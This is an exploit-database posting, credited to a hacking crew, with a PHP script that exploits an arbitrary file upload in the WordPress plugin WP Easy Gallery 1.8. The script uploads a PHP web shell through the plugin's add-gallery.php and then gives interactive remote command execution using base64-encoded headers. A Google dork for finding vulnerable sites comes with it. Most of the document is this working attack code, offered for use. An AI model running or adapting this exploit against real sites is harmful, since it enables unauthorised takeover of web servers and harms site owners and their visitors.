Home / exploits WordPress WP Easy Gallery 1.8 Shell Upload
Posted on 08 June 2012
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : Wordpress Plugins (wp-easy-gallery v1.8) Arbitrary Shell Upload # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com | www.inj3ct0rs.com # FaCeb0ok : http://fb.me/Inj3ct0rK3d # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com # platform : php # Type : Multiple # Security Risk : Critical # Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 # Download : [http://downloads.wordpress.org/plugin/wp-easy-gallery.zip] # Google d0rk : allinurl:/wp-content/plugins/wp-easy-gallery/ ### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha | # | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** | # | ------------------------------------------------- < | ## # <3 <3 Greetings t0 Palestine <3 <3 #### Exploit Code (via PHP) : <?php error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print " [-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } print " |=================================================================|"; print " | Wordpress Plugins (wp-easy-gallery v1.8) Arbitrary Shell Upload |"; print " | Provided By KedAns-Dz <ked-h[at]hotmail[.]com> |"; print " |=================================================================| "; if ($argc < 2) { print " Usage : php $argv[0] [host] [path]"; print " Example : php $argv[0] www.p0c.tld /wp/ "; die(); } $host = $argv[1]; $path = $argv[2]; $data = "--31337 "; $data .= "Content-Disposition: form-data; name="galleryName"; filename="k3d.php" "; $data .= "Content-Type: application/octet-stream "; $data .= "<?php ${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?> "; $data .= "--31337-- "; $packet = "POST {$path}/wp-content/plugins/wp-easy-gallery/admin/add-gallery.php HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Content-Length: ".strlen($data)." "; $packet .= "Content-Type: multipart/form-data; boundary=31337 "; $packet .= "Connection: close "; $packet .= $data; preg_match("/OnUploadCompleted((.*),"(.*)","(.*)",/i", http_send($host, $packet), $html); if (!in_array(intval($html[1]), array(0, 201))) die(" [-] Upload failed! (Error {$html[1]}) "); else print " [-] Shell uploaded to {$html[2]}...starting it! "; define(STDIN, fopen("php://stdin", "r")); while(1) { print " Inj3ct0rK3d-Sh3lL#"; $cmd = trim(fgets(STDIN)); # f.ex : C:\k3d.php if ($cmd != "exit") { $packet = "GET {$path}k3d.php{$html[3]} HTTP/1.0 "; $packet.= "Host: {$host} "; $packet.= "Cmd: ".base64_encode($cmd)." "; # for Encoded You'r Shell $packet.= "Connection: close "; $output = http_send($host, $packet); if (eregi("print", $output) || !eregi("_code_", $output)) die(" [-] Exploit failed... "); $shell = explode("_code_", $output); print " {$shell[1]}"; } else break; } ?> #### << ThE|End #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke # JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs #============================================================================================================
